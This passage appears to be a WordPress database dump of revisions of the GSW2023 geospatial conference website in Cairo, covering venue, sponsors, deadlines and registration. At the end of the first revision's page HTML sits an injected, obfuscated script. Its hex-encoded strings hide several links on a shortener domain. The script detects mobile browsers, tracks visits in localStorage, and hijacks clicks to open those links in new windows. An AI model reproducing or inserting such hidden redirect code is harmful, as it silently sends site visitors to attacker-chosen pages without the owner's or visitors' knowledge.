!important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 01:57:35','2023-04-02 01:57:35','',3066,'https://gsw2023.com/?p=3999',0,'revision','',0),
(4000,1,'2023-04-02 01:58:32','2023-04-02 01:58:32','<p>[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400344244{margin-top: 95px !important;}\"]&nbsp;</p>\n<p><img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400550419{margin-top: 125px !important;}\"]</p>\n<h6></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400702580{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"]&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color:white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 